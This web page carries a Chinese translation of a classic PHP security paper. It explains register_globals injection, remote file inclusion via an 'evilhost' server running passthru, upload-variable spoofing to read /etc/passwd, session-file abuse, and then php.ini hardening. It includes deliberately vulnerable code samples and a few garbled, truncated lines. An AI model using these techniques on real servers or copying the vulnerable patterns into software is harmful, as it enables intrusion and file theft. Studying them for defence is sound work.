
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>如何对PHP程序中的常见漏洞进行攻击_php基础 / iVAN</title>

    <meta name="description" content="如何对PHP程序中的常见漏洞进行攻击_php基础 来源:Chinaasp 之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少.Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在http://www.securereality.com.au/stu...arlet.txt找到. 由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译.如果你想了解这方面的知识,请参考原文. 文章主要从">
  

  <!-- <link rel="shortcut icon" href="/favicon.png"> -->  
  <link href="https://pic.ikafan.com/staticx/iamivan/2/assets/css/bootstrap.css" rel="stylesheet">
  <link href="https://pic.ikafan.com/staticx/iamivan/2/assets/css/style.css" rel="stylesheet">
  <link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed/" />
  <script src="https://n4.ikafan.com/g/show.js"></script>
  <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!--[if lt IE 9]>
  <script src="/assets/js/html5shiv.js"></script>
  <script src="/assets/js/respond.min.js"></script>
  <![endif]-->
  <script>
  var _hmt = _hmt || [];
  (function() {
    var hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?c61d51e9fdcf1d1631ddfce8df9cd119";
    var s = document.getElementsByTagName("script")[0]; 
    s.parentNode.insertBefore(hm, s);
  })();
  </script>
 
</head>

<body>

  <div class="wrapper">

    <header id="header" class="container">
    
      <div id="logo">
        <a href="/"><img src="https://pic.ikafan.com/staticx/iamivan/2/assets/logo.png" title="" /></a>
      </div><!-- /logo -->

      <nav id="menu" class="navbar navbar-inverse hidden-xs">
        <div class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="/"><i class="glyphicon glyphicon-home"></i></a></li>
            <li><a href="/">首页</a></li>
            <li><a href="/tag/互联网/">互联网</a></li>
            <li><a href="/tag/java/">java</a></li>
            <li><a href="/tag/mysql/">mysql</a></li>
            <li><a href="/tag/android/">Android</a></li>
            <li><a href="/tag/ios/">IOS</a></li>
          </ul>
        </div>
        <form method="post" id="searchform" action="/search/">
             <input type="text" value="" name="keyword" id="keyword" title="search" /><input type="submit" value="Search" id="searchsubmit" />
        </form>
      </nav><!-- /nav -->

    </header>
    <!-- /header -->


    
    <div class="container">
      <div class="row">    <div id="main" class="col-md-8">


<h1 class="mtitle">如何对PHP程序中的常见漏洞进行攻击_php基础</h1>
<div id="single_top"></div>
<script>insertAdIfNeeded();</script>

    	<section>
		<article class="clearfix">
		<p>来源:Chinaasp <br />之所以翻译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP，PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题，原文可以在http://www.securereality.com.au/stu...arlet.txt找到。</p>
<p>由于原文比较长，而且有相当一部分是介绍文章的背景或PHP的基础知识，没有涉及到PHP安全方面的内容，因此我没有翻译。如果你想了解这方面的知识，请参考原文。</p>
<p>文章主要从全局变量，远程文件，文件上载，库文件，Session文件，数据类型和容易出错的函数这几个方面分析了PHP的安全性，并且对如何增强PHP的安全性提出了一些有用的建议。</p>
<p>好了，废话少说，我们言归正传！</p>
<p>[全局变量] <br />PHP中的变量不需要事先声明，它们会在第一次使用时自动创建，它们的类型也不需要指定，它们会根据上下文环境自动确定。从程序员的角度来看，这无疑是一种极其方便的处理方法。很显然，这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了，就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量，毕竟，当它们第一次创建时，他们是空的。</p>
<p>很显然，基于PHP的应用程序的主函数一般都是接受用户的输入（主要是表单变量，上载文件和Cookie等），然后对输入数据进行处理，然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易，实际上PHP是把这些输入数据看作全局变量来处理的。</p>
<p>例如：</p>
<p>&lt;FORM METHOD="GET" ACTION="test.php"&gt; <br />&lt;INPUT TYPE="TEXT" NAME="hello"&gt; <br />&lt;INPUT TYPE="SUBMIT"&gt; <br />&lt;/FORM&gt;</p>
<p>很显然，这会显示一个文本框和提交按钮。当用户点击提交按钮时，“test.php”会处理用户的输入，当“test.php”运行时，“$hello”会包含用户在文本框输入的数据。从这里我们应该看出，攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用“test.php”，而是直接在浏览器地址栏输入http://server/test.php?hello=hi&amp;set...敲矗恢故恰?/a&gt;$hello”被创建，“$setup”也被创建了。</p>
<p>译者注：这两种方法也就是我们通常说的“POST”和“GET”方法。 <br />下面的用户认证代码暴露了PHP的全局变量所导致的安全问题：</p>
<p>&lt;?php <br />if ($pass == "hello") <br />$auth = 1; <br />... <br />if ($auth == 1) <br />echo "some important information"; <br />?&gt;</p>
<p>上面的代码首先检查用户的密码是否为“hello”，如果匹配的话，设置“$auth”为“1”，即通过认证。之后如果“$suth”为“1”的话，就会显示一些重要信息。</p>
<p>表面看起来是正确的，而且我们中有相当一部分人是这样做的，但是这段代码犯了想当然的错误，它假定“$auth”在没有设置值的时候是空的，却没有想到攻击者可以创建任何全局变量并赋值，通过类似“http://server/test.php?auth=1”的方...且丫现す摹?/a&gt;</p>
<p>因此，为了提高PHP程序的安全性，我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话，这可是一项非常艰巨的任务。</p>
<p>一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量，这依赖于我们的提交方式（GET或POST）。当PHP配置为打开“track_vars”选项的话（这是缺省值），用户提交的变量就可以在全局变量和上面提到的数组中获得。</p>
<p>但是值得说明的是，PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量，HTTP_POST_VARS数组用于处理POST方式提交的变量，HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量，而对于HTTP_POST_FILES数组（比较新的PHP才提供），则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中，因此一个安全的PHP程序应该检查这四个数组。</p>
<p>[远程文件] <br />PHP是一种具有丰富特性的语言，提供了大量的函数，使编程者实现某个功能很容易。但是从安全的角度来看，功能越多，要保证它的安全性就越难，远程文件就是说明这个问题的一个很好的例子：</p>
<p>&lt;?php <br />if (!($fd = fopen("$filename", "r")) <br />echo("Could not open file: $filename&lt;BR&gt;n"); <br />?&gt;</p>
<p>上面的脚本试图打开文件“$filename”，如果失败就显示错误信息。很明显，如果我们能够指定“$filename”的话，就能利用这个脚本浏览系统中的任何文件。但是，这个脚本还存在一个不太明显的特性，那就是它可以从任何其它WEB或FTP站点读取文件。实际上，PHP的大多数文件处理函数对远程文件的处理是透明的。</p>
<p>例如： <br />如果指定“$filename”为“http://target/scripts/..%c1%1c../wi...md.exe?/c+dir” <br />则上面的代码实际上是利用主机target上的unicode漏洞，执行了dir命令。</p>
<p>这使得支持远程文件的include()，require()，include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容，并且把它们按照PHP代码解释，主要是用在库文件上。</p>
<p>例如： <br />&lt;?php <br />include($libdir . "/languages.php"); <br />?&gt;</p>
<p>上例中“$libdir”一般是一个在执行代码前已经设置好的路径，如果攻击者能够使得“$libdir”没有被设置的话，那么他就可以改变这个路径。但是攻击者并不能做任何事情，因为他们只能在他们指定的路径中访问文件languages.php（perl中的“Poison null byte”攻击对PHP没有作用）。但是由于有了对远程文件的支持，攻击者就可以做任何事情。例如，攻击者可以在某台服务器上放一个文件languages.php，包含如下内容：</p>
<p>&lt;?php <br />passthru("/bin/ls /etc"); <br />?&gt;</p>
<p>然后把“$libdir”设置为“http://&lt;evilhost&gt;/”，这样我们就可以在目标主机上执行上面的攻击代码，“/etc”目录的内容作为结果返回到客户的浏览器中。</p>
<p>需要注意的是，攻击服务器（也就是evilhost）应该不能执行PHP代码，否则攻击代码会在攻击服务器，而不是目标服务器执行，如果你想了解具体的技术细节，请参考：http://www.securereality.com.au/sradv00006.txt</p>
<p>[文件上载] <br />PHP自动支持基于RFC 1867的文件上载，我们看下面的例子：</p>
<p>&lt;FORM METHOD="POST" ENCTYPE="multipart/form-data"&gt; <br />&lt;INPUT TYPE="FILE" NAME="hello"&gt; <br />&lt;INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240"&gt; <br />&lt;INPUT TYPE="SUBMIT"&gt; <br />&lt;/FORM&gt;</p>
<p>上面的代码让用户从本地机器选择一个文件，当点击提交后，文件就会被上载到服务器。这显然是很有用的功能，但是PHP的响应方式使这项功能变的不安全。当PHP第一次接到这种请求，甚至在它开始解析被调用的PHP代码之前，它会先接受远程用户的文件，检查文件的长度是否超过“$MAX_FILE_SIZE variable”定义的值，如果通过这些测试的话，文件就会被存在本地的一个临时目录中。</p>
<p>因此，攻击者可以发送任意文件给运行PHP的主机，在PHP程序还没有决定是否接受文件上载时，文件已经被存在服务器上了。</p>
<p>这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。</p>
<p>让我们考虑一下处理文件上载的PHP程序，正如我们上面说的，文件被接收并且存在服务器上（位置是在配置文件中指定的，一般是/tmp），扩展名一般是随机的，类似“phpxXuoXG”的形式。PHP程序需要上载文件的信息以便处理它，这可以通过两种方式，一种方式是在PHP 3中已经使用的，另一种是在我们对以前的方法提出安全公告后引入的。</p>
<p>但是，我们可以肯定的说，问题还是存在的，大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件，比如说上面的例子：</p>
<p>$hello = Filename on local machine (e.g "/tmp/phpxXuoXG") <br />$hello_size = Size in bytes of file (e.g 1024) <br />$hello_name = The original name of the file on the remote system (e.g "c:\temp\hello.txt") <br />$hello_type = Mime type of uploaded file (e.g "text/plain")</p>
<p>然后PHP程序开始处理根据“$hello”指定的文件，问题在于“$hello”不一定是一个PHP设置的变量，任何远程用户都可以指定它。如果我们使用下面的方式：</p>
<p>http://vulnhost/vuln.php?hello=/etc..._name=hello.txt</p>
<p>就导致了下面的PHP全局变量（当然POST方式也可以（甚至是Cookie））：</p>
<p>$hello = "/etc/passwd" <br />$hello_size = 10240 <br />$hello_type = "text/plain" <br />$hello_name = "hello.txt"</p>
<p>上面的表单数据正好满足了PHP程序所期望的变量，但是这时PHP程序不再处理上载的文件，而是处理“/etc/passwd”（通常会导致内容暴露）。这种攻击可以用于暴露任何敏感文件的内容。</p>
<p>我在前面已经说了，新版本的PHP使用HTTP_POST_FILES[]来决定上载文件，同时也提供了很多函数来解决这个问题，例如有一个函数用来判断某个文件是不是实际上载的文件。这些函数很好的解决了这个问题，但是实际上肯定有很多PHP程序仍然使用旧的方法，很容易受到这种攻击。</p>
<p>作为文件上载的攻击方法的一个变种，我们看一下下面的一段代码：</p>
<p>&lt;?php <br />if (file_exists($theme)) // Checks the file exists on the local system (no remote files) <br />include("$theme"); <br />?&gt;</p>
<p>如果攻击者可以控制“$theme”的话，很显然它可以利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令，但是他无法使用远程文件，因此，他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的，但是文件上载帮了我们这个忙，如果攻击者先在本地机器上创建一个包含PHP代码的文件，然后创建一个包含名为“theme”的文件域的表单，最后用这个表单通过文件上载把创建的包含PHP代码的文件提交给上面的代码，PHP就会把攻击者提交的文件保存起来，并把“$theme”的值设置为攻击者提交的文件，这样file_exists()函数会检查通过，攻击者的代码也将执行。</p>
<p>获得执行任意指令的能力之后，攻击者显然想提升权限或者是扩大战果，而这又需要一些服务器上没有的工具集，而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具，把她们存在服务器上，然后利用他们执行指令的能力，使用chmod()改变文件的权限，然后执行。例如：攻击者可以绕过防火墙或IDS上载一个本地root攻击程序，然后执行，这样就获得了root权限。</p>
<p>[库文件] <br />正如我们前面讨论的那样，include()和require()主要是为了支持代码库，因为我们一般是把一些经常使用的函数放到一个独立的文件中，这个独立的文件就是代码库，当需要使用其中的函数时，我们只要把这个代码库包含到当前的文件中就可以了。</p>
<p>最初，人们开发和发布PHP程序的时候，为了区别代码库和主程序代码，一般是为代码库文件设置一个“.inc”的扩展名，但是他们很快发现这是一个错误，因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时，我们就会得到该文件的源代码，这是因为当把PHP作为Apache的模块使用时，PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的，一般是“.php”， “.php3”和“.php4”。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中，那么远程攻击者很容易得到这些信息。</p>
<p>最简单的解决方法就是给每个文件都指定一个PHP文件的扩展名，这样可以很好的防止泄露源代码的问题，但是又产生了新的问题，通过请求这个文件，攻击者可能使本该在上下文环境中运行的代码独立运行，这可能导致前面讨论的全部攻击。</p>
<p>下面是一个很明显的例子：</p>
<p>In main.php: <br />&lt;?php <br />$libDir = "/libdir"; <br />$langDir = "$libdir/languages";</p>
<p>...</p>
<p>include("$libdir/loadlanguage.php": <br />?&gt;</p>
<p>In libdir/loadlanguage.php: <br />&lt;?php <br />...</p>
<p>include("$langDir/$userLang"); <br />?&gt;</p>
<p>当“libdir/loadlanguage.php”被“main.php”调用时是相当安全的，但是因为“libdir/loadlanguage”具有“.php”的扩展名，因此远程攻击者可以直接请求这个文件，并且可以任意指定“$langDir”和“$userLang”的值。 <br />[Session文件] <br />PHP 4或更新的版本提供了对sessions的支持，它的主要作用是在PHP程序中保存页与页之间的状态信息。例如，当一个用户登陆进入网站，他登陆了这个事实以及谁登陆进入这个网站都被保存在session中，当他在网站中到处浏览时，所有的PHP代码都可以获得这些状态信息。</p>
<p>事实上，当一个session启动时（实际上是在配置文件中设置为在第一次请求时自动启动），就会生成一个随机的“session id”，如果远程浏览器总是在发送请求时提交这个“session id”的话，session就会一直保持。这通过Cookie很容易实现，也可以通过在每页提交一个表单变量（包含“session id”）来实现。PHP程序可以用session注册一个特殊的变量，它的值会在每个PHP脚本结束后存在session文件中，也会在每个PHP脚本开始前加载到变量中。下面是一个简单的例子：</p>
<p>&lt;?php <br />session_destroy(); // Kill any data currently in the session <br />$session_auth = "shaun"; <br />session_register("session_auth"); // Register $session_auth as a session variable <br />?&gt;</p>
<p>新版本的PHP都会自动把“$session_auth”的值设置为“shaun”，如果它们被修改的话，以后的脚本都会自动接受修改后的值，这对无状态的Web来说的确是种很不错的工具，但是我们也应该小心。</p>
<p>一个很明显的问题就是确保变量的确来自session，例如，给定上面的代码，如果后续的脚本是下面这样的话：</p>
<p>&lt;?php <br />if (!empty($session_auth)) <br />// Grant access to site here <br />?&gt;</p>
<p>上面的代码假定如果“$session_auth”被置位的话，就是从session，而不是从用户输入来置位的，如果攻击者通过表单输入来置位的话，他就可以获得对站点的访问权。注意攻击者必须在session注册该变量之前使用这种攻击方法，一旦变量被放进了session，就会覆盖任何表单输入。</p>
<p>Session数据一般是保存在文件中（位置是可配置的，一般是“/tmp”），文件名一般是类似“sess_&lt;session id&gt;”的形式，这个文件包含变量名称，变量类型，变量值和一些其它的数据。在多主机系统中，因为文件是以运行Web服务器的用户身份（一般是nobody）保存的，因此恶意的站点拥有者就可以通过创建一个session文件来获得对其它站点的访问，甚至可以检查session文件中的敏感信息。</p>
<p>Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方，对于上面的例子来说，攻击者需要在远程系统放置一个包含PHP代码的文件，如果不能利用文件上载做到的话，他通常会利用session为一个变量按照自己的意愿赋一个值，然后猜测session文件的位置，而他知道文件名是“php&lt;session id&gt;”，所以只需猜测目录，而目录一般就是“/tmp”。</p>
<p>另外，攻击者可以任意指定“session id”（例如“hello”），然后用这个“session id”创建一个session文件（例如“/tmp/sess_hello”），但是“session id”只能是字母和数字组合。</p>
<p>[数据类型] <br />PHP具有比较松散的数据类型，变量的类型依赖于它们所处的上下文环境。例如：“$hello”开始是字符串变量，值为“”，但是在求值时，就变成了整形变量“0”，这有时可能会导致一些意想不到的结果。如果“$hello”的值为“000”还是为“0”是不同的，empty()返回的结果也不会为真。</p>
<p>PHP中的数组是关联数组，也就是说，数组的索引是字符串型的。这意味着“$hello["000"]”和“$hello[0]”也是不同的。</p>
<p>开发程序的时候应该仔细地考虑上面的问题，例如，我们不应该在一个地方测试某个变量是否为“0”，而在另外的地方使用empty()来验证。</p>
<p>[容易出错的函数] <br />我们在分析PHP程序中的漏洞时，如果能够拿到源代码的话，那么一份容易出错的函数列表则是我们非常需要的。如果我们能够远程改变这些函数的参数的话，那么我们就很可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表：</p>
<p>&lt;PHP代码执行&gt; <br />require()：读取指定文件的内容并且作为PHP代码解释 <br />include()：同上 <br />eval()：把给定的字符串作为PHP代码执行 <br />preg_replace()：当与“/e”开关一起使用时，替换字符串将被解释为PHP代码</p>
<p>&lt;命令执行&gt; <br />exec()：执行指定的命令，返回执行结果的最后一行 <br />passthru()：执行指定命令，返回所有结果到客户浏览器 <br />``：执行指定命令，返回所有结果到一个数组 <br />system()：同passthru()，但是不处理二进制数据 <br />popen()：执行指定的命令，把输入或输出连接到PHP文件描述符</p>
<p>&lt;文件泄露&gt; <br />fopen()：打开文件，并对应一个PHP文件描述符 <br />readfile()：读取文件的内容，然后输出到客户浏览器 <br />file()：把整个文件内容读到一个数组中</p>
<p>译者注：其实这份列表还不是很全，比如“mail()”等命令也可能执行命令，所以需要自己补充一下。 <br />[如何增强PHP的安全性] <br />我在上面介绍的所有攻击对于缺省安装的PHP 4都可以很好的实现，但是我已经重复了很多次，PHP的配置非常灵活，通过配置一些PHP选项，我们完全可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类：</p>
<p>*低难度 <br />**中低难度 <br />***中高难度 <br />****高难度</p>
<p>上面的分类只是个人的看法，但是我可以保证，如果你使用了PHP提供的所有选项的话，那么你的PHP将是很安全的，即使是第三方的代码也是如此，因为其中很多功能已经不能使用。</p>
<p>**** 设置“register_globals”为“off” <br />这个选项会禁止PHP为用户输入创建全局变量，也就是说，如果用户提交表单变量“hello”，PHP不会创建“$ hello”，而只会创建“HTTP_GET/POST_VARS['hello']”。这是PHP中一个极其重要的选项，关闭这个选项，会给编程带来很大的不便。</p>
<p>*** 设置“safe_mode”为“on” <br />打开这个选项，会增加如下限制： <br />1． 限制哪个命令可以被执行 <br />2． 限制哪个函数可以被使用 <br />3． 基于脚本所有权和目标文件所有权的文件访问限制 <br />4． 禁止文件上载功能 <br />这对于ISP来说是一个伟大的选项，同时它也能极大地改进PHP的安全性。</p>
<p>** 设置“open_basedir” <br />这个选项可以禁止指定目录之外的文件操作，有效地消除了本地文件或者是远程文件被include()的攻击，但是仍需要注意文件上载和session文件的攻击。</p>
<p>** 设置“display_errors”为“off”，设置“log_errors”为“on” <br />这个选项禁止把错误信息显示在网页中，而是记录到日志文件中，这可以有效的抵制攻击者对目标脚本中函数的探测。</p>
<p>* 设置“allow_url_fopen”为“off” <br />这个选项可以禁止远程文件功能，极力推荐！</p>
<p> </p>
<p> </p>
<p> </p>				<div id="single_bottom"></div>
<script>insertAdIfNeeded();</script>
				<div id="time"><strong>时间：</strong> 2024-02-20 01:07:51</div>
		
		</article>

		<!-- social network share -->

<!-- 		<div id="tags">
            <strong>Tags:</strong>         </div> -->
	</section>
	
	

		<div id="similar">

		<h3>如何对PHP程序中的常见漏洞进行攻击_php基础的相关文章</h3>

								<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/z7QxYAM.html" rel="bookmark">如何对PHP程序中的常见漏洞进行攻击（下）&lowbar;php基础</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				如何对PHP程序中的常见漏洞进行攻击(下) 翻译:analysist(分析家) 来源:http://www.china4lert.org 如何对PHP程序中的常见漏洞进行攻击(下) 原著:Shaun Clowes &lt;http://www.securereality.com.au/&gt; 翻译:analysist &lt;http://www.nsfocus.com/&gt; [库文件] 正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/MvYnYVb.html" rel="bookmark">如何对PHP程序中的常见漏洞进行攻击（上）&lowbar;php基础</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				如何对PHP程序中的常见漏洞进行攻击(上) 翻译:analysist(分析家) 来源:http://www.china4lert.org 如何对PHP程序中的常见漏洞进行攻击(上) 原著:Shaun Clowes &lt;http://www.securereality.com.au/&gt; 翻译:analysist &lt;http://www.nsfocus.com/&gt; 之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/wzVyLlp.html" rel="bookmark">如何对PHP程序中的常见漏洞进行攻击（下）</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				程序|攻击 库文件] 正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以了. 最初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个&quot;.inc&quot;的扩展名,但是他们很快发现这是一个错误,因为这样的文件无法被PHP解释器正确解析为PHP代码.如果我们直接请求服务器上的这种			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/apXeLyz.html" rel="bookmark">如何对PHP程序中的常见漏洞进行攻击（上）</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				程序|攻击 由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译.如果你想了解这方面的知识,请参考原文. 文章主要从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性,并且对如何增强PHP的安全性提出了一些有用的建议. 好了,废话少说,我们言归正传! [全局变量] PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型也不需要指定,它们会根据上下文环境自动确			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/7b2GJVM.html" rel="bookmark">对PHP程序中的常见漏洞进行攻击</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少.Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在http://www.securereality.com.au/studyinscarlet.txt找到.  由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译.如果你想了解这方面的知识,请参考原文. 文章主要从全局变量,远程文			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/pdmmNAz.html" rel="bookmark">如何对PHP程序中的常见漏洞进行攻击（上）第1&sol;2页&lowbar;php技巧</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者JSP安全性的文章则很少.Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题,原文可以在http: //www.securereality.com.au/studyinscarlet.txt找到.  由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译.如果你想了解这方面的知识,请参考原文.  文章主要从全局变量,远			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/MvY9D1b.html" rel="bookmark">如何对PHP程序中的常见漏洞进行攻击&lowbar;漏洞研究</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				[库文件] 正如我们前面讨论的那样include()和require()主要是为了支持代码库因为我们一般是把一些经常使用的函数放到一个独立的文件中这个独立的文件就是代码库当需要使用其中的函数时我们只要把这个代码库包含到当前的文件中就可以了. 最初人们开发和发布PHP程序的时候为了区别代码库和主程序代码一般是为代码库文件设置一个&quot;.inc&quot;的扩展名但是他们很快发现这是一个错误因为这样的文件无法被PHP解释器正确解析为PHP代码.如果我们直接请求服务器上的这种文件时我们就会得到该文件的源代			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/MgEyN6z.html" rel="bookmark">PHP编程中的常见漏洞和代码实例&lowbar;php技巧</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种.在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性. 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定.从程序员的角度来看,这无疑是一种极其方便的处理方法.一旦一个变量被创建了,就可以在程序中的任何地方使用.这个特点导致的结果就是程序员很			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/p5QQBqp.html" rel="bookmark">PHP中显示格式化的用户输入&lowbar;php基础</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				你可以在这个页面下载这个文档附带的文件,也可以在文件下载中的字符处理中下载这个文档描述如何安全显示的有格式的用户输入.我们将讨论没有经过过滤的输出的危险,给出一个安全的显示格式化输出的方法. 没有过滤输出的危险 如果你仅仅获得用户的输入然后显示它,你可能会破坏你的输出页面,如一些人能恶意地在他们提交的输入框中嵌入javascript脚本: This is my comment. &lt;script language=&quot;javascript: alert('Do something bad he			</div>
		</article>
	</section>
	
	</div><!-- /related -->
	


</div>
<!-- /main -->


<aside class="col-md-4">



	<div class="box box-gallery1">
		<div class="box-heading">
			<span>猜你喜欢</span>
		</div>
		<div class="box-content">

									<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/OM9LoXb.html" rel="bookmark" class="title">炳叔谈个人媒体时代的公关运作</a>
					<div>
						1.他叫炳叔.本周的金山星期二请到了炳叔,原Donews牛人,现ZDnet策划牛人.炳叔的外形很酷,但他的演讲更酷,嬉笑怒骂结成文章,场下笑声很多,像听郭德纲的单口相声--如果炳叔有兴趣,我觉得可以加 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/ze4eYNp.html" rel="bookmark" class="title">linux复制、删除、移动文件的命令：cp、rm、mv</a>
					<div>
						  cp命令将源文件或目录复制到目标文件或目录中.如果源文件是普通文件,则该命令把它复制到指定的目标文件中;如果是目录,就需要使用&quot;-r&quot;选项,将整个目录下所有的文件和子目录都复制 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zVwLaDb.html" rel="bookmark" class="title">Windows7有线网卡自动获取IP地址设置</a>
					<div>
						  设置动画示范教程: Windows 7系统有线网卡自动获取IP地址的详细设置步骤如下: 第一步:鼠标点击电脑桌面右下角小电脑图标,在弹出的对话框中,点击 打开网络和共享中心.如下图所示: 第二步: ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pnYDJOM.html" rel="bookmark" class="title">用FrongPage设计网页花样</a>
					<div>
						  技术在进步,思维在发展,网页上的花样当然也要一天天地赶时髦了.在&quot;滚动字符&quot;.&quot;跑马灯&quot;已成平常的今天,网页上还能变出新花样吗?  ◆制作鼠标指针指在上面时 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/M1E8GxM.html" rel="bookmark" class="title">修改PE系统设定的2种方法</a>
					<div>
						  一.修改内部注册表的方法. 1.首先将内部注册表的文件提取出来: WXPESYSTEM32CONFIG*.*WXPESYSTEM32SETUPREG.HI_(这是CAB压缩包,将它解开成SETUP ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/ze6Rwjb.html" rel="bookmark" class="title">xcode-Xcode中 如何让视图刷新</a>
					<div>
						问题描述 Xcode中 如何让视图刷新 写了一个程序 storyboard中用了一个label来显示一个数 使用一个按钮来改变数的值,但是数据改变之后视图没有变化.我在viewcontroller中引 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bQrjP8M.html" rel="bookmark" class="title">Linux上GDM登录界面如何适应高分屏</a>
					<div>
						GDM(GNOME Desktop Manager)是一种 GNOME 显示环境的管理器,它是一个运行在后台的小程序(脚本),用于运行你的 X 会话,显示一个登录界面并在你正确输入密码后才允许登录.G ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/My3vWdz.html" rel="bookmark" class="title">c-&ast;a1&equals;&ast;a1&Hat;&ast;b1&semi;这句的功能是什么</a>
					<div>
						问题描述 *a1=*a1^*b1;这句的功能是什么 #include int main(void) { int *a1,*b1,*c1,a,b,c; a1=&amp;a; b1=&amp;b; c1= ...					</div>
				</div>
			</div>
						<div class="item clearfix">
